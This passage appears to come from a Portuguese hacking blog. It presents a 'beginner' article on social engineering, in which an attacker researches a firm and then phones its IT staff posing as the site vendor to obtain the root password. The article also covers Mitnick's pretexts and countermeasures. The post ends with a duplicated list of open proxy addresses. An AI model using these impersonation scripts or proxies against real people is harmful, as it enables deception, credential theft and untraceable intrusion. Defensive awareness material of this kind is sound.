operadora local de telefonia colabore ou que a empresa atacada possua estrutura de identificacao mais sofisticada (no caso de telefonia)
Lembre-se engenharia social não se aplica só no Cyber-Spaço, Mais sim na vida Real! :Greedy:
Conteúdo Básico Para Iniciantes
Peguei essa materia em um antigo blog que eu tinha (Nen lembro se foi eu mesmo que escrevi ou não) mas de qualquer forma eu estou disponibilizando para vocês, afinal engenharia social é o 1ºPasso para um iniciante! :Laughing:
Como evitar ataques de engenharia social?
O fator humano é uma das maiores causas de invasões e ataques na rede, seja por uma senha fraca ou pelo esquecimento de algum cuidado básico de segurança. Por isso devemos voltar nossa atenção para os "ataques" de engenharia social, que muita vezes podem dar acesso root para um cracker em menos de 10 minutos, dependendo da habilidade do mesmo. Um ataque de engenharia social é muito mais popular do que se pensa, uma vez que, se bem aplicado, é praticamente indetectável. Vamos abordar algumas etapas de um "ataque" de engenharia social como exemplo e também como evoluir o fator humano para que não caia nesse golpe. A informação está na rede. Tudo que um "engenheiro social" precisa é de informações sobre a empresa que pretende atacar. Onde encontrá-las ? Na própria internet. Uma simples visita ao site da empresa pode revelar detalhes interessantes como : empresa que produziu o site (usarei o nome ficticio XXX para me referir a esta empresa), programas que são usados no site (bancos de dados,sistema operacional,etc...), empresas parceiras, etc. De posse dessas informações fica bastante fácil planejar um golpe de "people spoofing" (termo interessante, não ?). O invasor pode ainda usar uma ferramenta de varredura de redes e descobrir que o sistema operacional é, por exemplo, um OpenBSD "nao-exploravel" com a porta 22 aberta (referente ao sshd para conexao remota), agora só é preciso uma senha. De posse desses dados um cracker pode passar a mão no seu telefone e colher mais detalhes para finalmente lançar-se em direção ao alvo. Assim o cracker liga para a empresa que fez o site da empresa alvo para descobrir jargões e nomes que poderá utilizar na sua investida. Passando-se por um cliente como qualquer outro ele pode adquirir o nome de funcionários da area técnica que eventualmente poderá usar para se "relacionar" com a empresa alvo, ele também cita o nome da empresa alvo dizendo que viu o logo da XXX no site dela e pergunta "inocentemente" detalhes sobre o serviço prestado para o alvo dessa forma consegue descobrir que eles possuem um servidor interno com um serviço de IP direto e um link de 1 Mb/s além de um __contrato de manutenção do site__. Manipulando a informação para o ataque De posse de tantos detalhes fica bastante fácil tramar um pequena história para envolver um funcionário inocente. Supondo que o "people spoofer" tenha descoberto que o funcionário responsável pela manutenção das páginas criadas pela empresa XXX seja o Fulano, ele liga para a empresa alvo passando-se por Fulano. Um possível diálogo poderia ser : Atendente : Empresa alvo. Boa Tarde. Cracker[Fulano] : Boa tarde. Eu sou Fulano da empresa XXX, nós criamos o site de vocês e eu preciso fazer uma manutenção na página, você pode me passar para o setor de informática? /* OBS.: Neste ponto não há o que fazer, a atendente simplesmente redireciona a chamada. A seguir veja onde está o problema.*/ Funcionário CPD : CPD. Boa tarde. Cracker[Fulano] : Boa tarde. Aqui é o Fulano, eu sou da Empresa XXX e não consegui me logar no servidor de vocês para ajustar alguns links. Vocês mudaram a senha do root ? /* Falando com profissional da área técnica, o Cracker já utiliza jargões comuns a todos nós. Como o Cracker havia ligado para a empresa XXX, que fez o site, ele já sabe como eles lidam com os clientes e também como falam ao se referirem a mesma coisa, como usar site,homepage,página,website,etc... */ Funcionário CPD : Hmmm...Até onde eu sei não foi mudado nada. Cracker[Fulano] : Estranho...A senha não é Bc07dp12 ? /* Neste ponto o funcionário já acretida estar falando com um funcioário da empresa XXX */ Funcionário CPD : Não, a senha é S3rvid0r. Com 'S' maiusculo. //Senha fraca por sinal O cracker conversa durante mais algum tempo para não gerar desconfiança e se despede agradecendo a colaboração. É claro que este diálogo normalmente é mais longo, porém de posse da informação correta o desfecho é quase sempre o mesmo. Tempo depois o site da empresa é invadido e tem a página principal totalmente desfigurada. Não se pode detectar a origem porque os logs foram todos apagados e ninguém sabe como aconteceu o ataque e também não se lembram que a senha foi passada por telefone para o suposto funcionário da empresa XXX. Vale lembrar que um ataque de engenharia social NÃO tem como objetivo principal simplesmente invadir um site e sim adquirir outros dados muito mais relevantes que poderiam inclusive serem vendidos para competidores. É possível inventar ataques desse tipo até onde a imaginação humana possa alcançar, caraterizando assim um golpe potencialmente perigoso. A única maneira de evitar esses ataques é implantar uma politica de segurança que tenha abrangencia sobre todos os setores da empresa. Gerenciando o fator humano. Neste exemplo acima tudo começou com uma visita ao site da empresa onde o Craker colheu varios dados iportantes sobre ela. O ponto fraco de um ataque de engenharia social não esta aqui. Não é preciso,nem recomendado, retirar os dados do site(removendo o logos powered by... ou design by...), o ponto fraco do exemplo acima se encontra no funcionário do CPD que passou a senha do superusuário por telefone para alguém que ele não teria como saber com certeza se era realmente quem dizia ser. Para evitar essa situação é preciso que seja implantada um politica de segurança dentro da empresa. 1 ) Senhas por telefone são muito perigosas. É muito mais seguro fazer isso por e-mail, o funcionário do CPD devia ter dito que "devido a uma politica de segurança eu não posso lhe passar a senha por telefone mas estarei enviando a senha para root@XXX.com.br...". Desta forma garante-se que a senha chegará em um lugar supostamente seguro, onde o suposto funcionário poderia,caso realmente fosse funcionário da empresa XXX, acessar facilmente. 2 ) Ética ao falar sobre outro cliente em específico. Os funcionários nunca devem passar detalhes de seus clientes para outros supostos clientes, isso representa um perigo já que a informação é tudo neste caso. Deve-se educar os funcionários para sempre falarem de maneira genérica. Este segundo item se aplica a empresa XXX que fez o site da empresa alvo e acabou revelando detalhes vitais para o Cracker. OBS.: NUNCA passar senhas por telefone, sempre usar e-mail ou pessoalmente. Caso estes dois passos acima fossem seguidos uma invasão seria evitada. Provedores de acesso a internet e empresas de telefonia também devem adotar politicas de segurança como esta porém com mais alguns itens. Quando um usuário liga dizendo que perdeu seu nome de usuário ou senha(ou ainda que gostaria de alguma outra informação referente a sua conta, resultado parcial da conta do celular por exemplo) a atendende além de solicitar o nome da pessoa deve pedir educadamente para "verificar se os dados da pessoa estão atualizados", dessa forma são solicitados os dados e conferidos com os dados constantes no cadastro. Caso os dados mais relevantes como nome completo,data de nascimento,RG,CPF sejam iguais ao do referente cadastro, poderá ser fornecida a informação solicitada para o cliente. Porém, mesmo fazendo todas essas verificações não é possível ter certeza de que a pessoa é realmente quem afirma ser( um cracker pode ter conseguido essas informações de alguma forma, revirando o lixo por exemplo ). Infelizmente esse processo pode se tornar cansativo e chatear um cliente que realmente perdeu seu nome de usuário ou senha, porém este processo é vital para se manter o minímo de segurança. Podemos ainda sugerir que na hora do cadastro seja solicitado ao cliente que estabeleça uma pergunta que ele deseja responder em situações como essas, assim ficam armazenados no cadastro a pergunta e resposta esperada, por exemplo : O cliente fez seu cadastro por telefone e após serem cadastrados todos os dados a antendente explica os motivos pelo qual é feito isso e pede para que o cliente recém cadastrado diga uma pergunta (que lhe será feita em casos de solicitação de dados sigilosos, senha, usuário, etc..) e uma resposta que também ficará armazenada no cadastro. Assim, o cliente quando for solicitar sua senha deve responder a pergunta : Atendente pergunta: Qual o nome de seu animal de estimação ? Cliente responde : Thunder. Caso a resposta seja correta a atendente poderá fornecer a informação para o cliente. É importante que a pergunta seja de cunho mais pessoal possível e que não se sobreponha a nenhum dos outros dados como "Qual minha data de nascimento ?". A atendente que cadastrar o cliente deve evitar que perguntas como essas sejam utilizadas. Muitas vezes é muito mais confortável para o cliente responder o CPF ou RG e a pergunta do que todos os dados do seu cadastro. Cadastros e formulários de recuperação de senhas pela internet devem seguir o mesmo padrão. Grande parte das empresas de telefonia fixa e celular exigem apenas o CPF para fornecerem dados como resultado parcial da conta ou solicitar algum novo serviço. Juntamente com os cuidados acima é recomendado usar em conjunto um serviço de indentificação de chamada ( BINA ), desta forma basta a pessoa que está fazendo o atendimento peguntar o telefone de onde o suposto cliente está ligando para posterior contato. Caso o telefone fornecido pelo suposto cliente e o constante no indentificador de chamada não sejam os mesmos, já pode-se descofiar de algo. O Lixo Tudo que é jogado no lixo de uma empresa pode ser aproveitado para a criação de um ataque de engenharia social. Basta criar situações em cima daqueles dados e pronto, por isso nunca jogar de forma aproveitável o seguintes itens : * Cadernetas com telefones; * Memorandos; * Manuais com politícas internas da empresa; * Calendários com informações sobre eventos, cursos ou férias; * Manuais dos Sistemas utilizados; * Qualquer coisa que contenha nome de usuários e senhas; (óbvio, mas acontece) * Disquetes,CDs ou HDs aparentemente inutilizáveis; * Papel timbrado da empresa. Sempre que algum destes itens forem jogados fora devem ser completamente inutilizados(picados, furados, queimados, etc). O caso Kevin Mitnick É impossível escrever um documento sobre engenharia social sem citar Kevin David Mitnick( também conhecido como Condor,N6NHG,Anton Chernoff,Fred Weiner,Lee Nussbaum,Brian Merrill,Tom Bodette e muitos outros nomes que usou em sua fase cracker/phreaker/engenheiro social ). Kevin obtinha sucesso na grande maioria dos ataques devido o fato de ser um sujeito com uma voz carismática ao telefone, fato este importatissímo para que as pessoas colaborassem. Ele treinava consigo mesmo seus ataques. Kevin costumava dizer "...eu pratico antes até me convencer de que a história que estou representando é real e acreditar nela..." . Mitnick não tinha muito critério para escolher seu alvo, apenas pensava "e se a pessoa do outro lado cair nessa história?", então pegava o telefone e executava seu "ataque". Ele conseguiu muito sucesso em suas investidas com uma simples simulação de um funcionário do Seguro Social americano. Veja o exemplo deste diálogo para ter uma ideia da facilidade de se conseguir a informação desejada : -- Alô, aqui é Tom Bodette, da Administração da Seguridade Social. Eu gostaria de saber se vocês podem me ajudar com um problema que estamos tentando esclarecer. -- Posso tentar. -- Nossos registros aqui parecem estar meio confusos. Achamos que as informações sobre seus parentes podem estar trocadas. Vejamos...O senhor conhece Mary Eberle ? -- É minha irmã. -- Sua irmã ? Então, quem é Joseph Wernle ? Mary por acaso tem um filho chamado Joseph Wernle ? -- Não, o filho dela se chama Joe Ways. -- Ele mora na Pensilvânia ? -- Não, no Sul da Califórnia. É agente do FBI. -- Sinto muito, então. Devo ter querido falar com Wernle errado... Com este simples telefonema Mitnick conseguiu mais informações sobre os agentes do FBI envolvidos no seu caso. Nesse diálogo podemos ver a dificuldade ou até mesmo a impossibilidade de evitar um ataque de engeharia social. A pessoa do outro lado da linha não teria o que argumentar caso não quisesse colaborar. Ataques de engeharia social para pessoas comuns tendem a ter um resultado muito mais satisfatório do que para empresas. Utilizando o mesmo nome ( Tom Bodette ) Kevin conseguiu descobrir telefones grampeados pela Pac Bell. Ele simplesmente ligou para o Centro de Controle e Comutação da Bell se passando por um funcionário da Bell e disse que precisava desligar o grampo para fazer uma manutenção e depois, ao pedir o número para ligar o grampo, descobria o telefone grampeado . Empresas de telefonia nas quais os funcionários se comunicam muito por telefone ou rádio devem criar um método para indentificação dos funcionários(código e senha). Caso algum técnico ligue para a central solicitando alguma informação deve ser checado seu código e senha no sistema da central e, caso estejam corretos, será feita uma verificação para assegurar que este funcionário pode ter acesso à informação solicitada. Acredito ter conseguido mostrar com esse documento uma pequena parte do mundo da engenharia social, um golpe que nunca deixou de existir e que pode passar facilmente por qualquer firewall do mundo. Vale lembrar que quem pratica engenharia social pode ser enquadrado no crime de falsidade ideológica com pena prevista de 1 (um) a 3 (três) anos de reclusão em regime fechado, portanto não devemos praticar engeharia social "apenas para testar". Também posso dizer que um "people spoofer" raramente é capturado, ao menos que a operadora local de telefonia colabore ou que a empresa atacada possua estrutura de identificacao mais sofisticada (no caso de telefonia)
Lembre-se engenharia social não se aplica só no Cyber-Spaço, Mais sim na vida Real! :Greedy:
Algums Proxy's
74.208.106.191:3128
204.236.225.147:80
208.71.63.135:443
173.73.85.114:80
206.196.111.73:80
174.143.220.135:80
74.50.51.185:80
206.53.252.104:80
173.45.227.172:80
207.150.184.42:80
208.71.63.135:80
76.22.131.174:80
24.17.196.204:80
24.18.64.203:80
72.34.128.230:80
75.40.150.160:80
64.62.199.11:80
12.204.158.237:80
63.146.118.37:80
216.9.6.148:8080
173.30.223.156:8080
173.10.155.93:80
209.107.217.164:80
208.178.94.93:8080
12.110.208.174:80
66.249.5.117:80
204.56.0.137:3124
128.2.211.115:3127
128.252.19.18:3124
158.130.006.253:3124
128.10.19.52:3124
128.208.04.198:3128
129.107.35.132:3127
204.56.0.137:3128
64.161.10.2:3128
128.8.126.111:3127
128.59.20.227:3124
165.230.49.115:3124
169.235.24.232:3124
131.247.2.241:3127
204.56.0.137:3127
165.230.49.115:3128
146.57.249.98:3124
156.56.250.226:3127
155.98.35.5:3124
198.133.224.146:3128
155.246.12.164:3127
35.9.27.27:3124
169.229.50.16:3127
155.246.12.164:3124
129.10.120.194:3124
128.112.139.28:3127
169.229.50.5:3128
137.165.1.111:3127
129.10.120.193:3128
129.105.15.38:3124
128.220.231.4:3128
139.182.137.140:3124
128.187.223.211:3127
128.252.19.19:3124
198.133.224.146:3127
199.26.254.66:3124
158.130.6.253:3128
128.119.41.210:3124
128.119.41.210:3127
131.179.50.70:3127
169.229.50.5:3127
35.9.27.26:3127
128.227.56.81:3124
128.208.4.197:3128
146.57.249.98:3128
128.208.004.197:3124
152.003.138.005:3127
131.247.2.247:3127
72.36.112.73:3127
199.26.254.69:3124
158.130.6.254:3127
129.107.35.131:3127
137.165.1.111:3124
128.220.231.5:3127
128.31.1.15:3124
128.31.1.17:3124
128.8.126.78:3124
169.226.40.4:3127
152.3.138.4:3127
128.59.20.227:3127
141.217.48.50:3124
155.98.35.8:3128
128.112.139.28:3124
169.229.50.14:3127
128.208.4.199:3124
141.212.113.178:3124
129.137.253.252:3124
208.117.131.115:3124
158.130.6.253:3124
128.6.192.156:3127
152.003.138.004:3127
155.98.35.7:3127
152.3.138.2:3124
129.10.120.193:3127
72.36.112.72:3127
204.236.225.147:80
208.71.63.135:443
173.73.85.114:80
206.196.111.73:80
174.143.220.135:80
74.50.51.185:80
206.53.252.104:80
173.45.227.172:80
207.150.184.42:80
208.71.63.135:80
76.22.131.174:80
24.17.196.204:80
24.18.64.203:80
72.34.128.230:80
75.40.150.160:80
64.62.199.11:80
12.204.158.237:80
63.146.118.37:80
216.9.6.148:8080
173.30.223.156:8080
173.10.155.93:80
209.107.217.164:80
208.178.94.93:8080
12.110.208.174:80
66.249.5.117:80
204.56.0.137:3124
128.2.211.115:3127
128.252.19.18:3124
158.130.006.253:3124
128.10.19.52:3124
128.208.04.198:3128
129.107.35.132:3127
204.56.0.137:3128
64.161.10.2:3128
128.8.126.111:3127
128.59.20.227:3124
165.230.49.115:3124
169.235.24.232:3124
131.247.2.241:3127
204.56.0.137:3127
165.230.49.115:3128
146.57.249.98:3124
156.56.250.226:3127
155.98.35.5:3124
198.133.224.146:3128
155.246.12.164:3127
35.9.27.27:3124
169.229.50.16:3127
155.246.12.164:3124
129.10.120.194:3124
128.112.139.28:3127
169.229.50.5:3128
137.165.1.111:3127
129.10.120.193:3128
129.105.15.38:3124
128.220.231.4:3128
139.182.137.140:3124
128.187.223.211:3127
128.252.19.19:3124
198.133.224.146:3127
199.26.254.66:3124
158.130.6.253:3128
128.119.41.210:3124
128.119.41.210:3127
131.179.50.70:3127
169.229.50.5:3127
35.9.27.26:3127
128.227.56.81:3124
128.208.4.197:3128
146.57.249.98:3128
128.208.004.197:3124
152.003.138.005:3127
131.247.2.247:3127
72.36.112.73:3127
199.26.254.69:3124
158.130.6.254:3127
129.107.35.131:3127
137.165.1.111:3124
128.220.231.5:3127
128.31.1.15:3124
128.31.1.17:3124
128.8.126.78:3124
169.226.40.4:3127
152.3.138.4:3127
128.59.20.227:3127
141.217.48.50:3124
155.98.35.8:3128
128.112.139.28:3124
169.229.50.14:3127
128.208.4.199:3124
141.212.113.178:3124
129.137.253.252:3124
208.117.131.115:3124
158.130.6.253:3124
128.6.192.156:3127
152.003.138.004:3127
155.98.35.7:3127
152.3.138.2:3124
129.10.120.193:3127
72.36.112.72:3127
Assinar:
Postagens (Atom)